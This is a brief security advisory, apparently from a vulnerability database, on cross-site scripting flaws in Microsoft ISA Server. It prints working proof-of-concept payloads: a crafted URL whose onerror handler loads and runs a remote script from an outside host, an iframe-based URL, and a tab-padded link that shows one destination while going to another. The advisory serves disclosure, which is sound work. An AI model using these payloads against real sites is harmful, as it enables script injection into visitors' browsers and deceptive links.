Microsoft ISA Server Cross-Site Scripting Vulnerabilities

Microsoft ISA Server Cross-Site Scripting Vulnerabilities

The following proof-of-concept was provided:
http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/%U0

The above proof-of-concept will include and execute http://jscript.dk/test.js on YOUR.TLD, this is provided that YOUR.TLD is protected by an ISA Server installation.

*http://<iframe>:test@[site]/test

The exploit provided for BID 4486 will also reportedly work for this vulnerability.

An additional proof-of-concept was supplied by "http-equiv@excite.com" <1@malware.com> that demonstrates a true status and a false destination:
<A href="http://www.example.com%09%09%09@%09%09%09%09%09%09
09www.malware.com">http://www.example.com</A>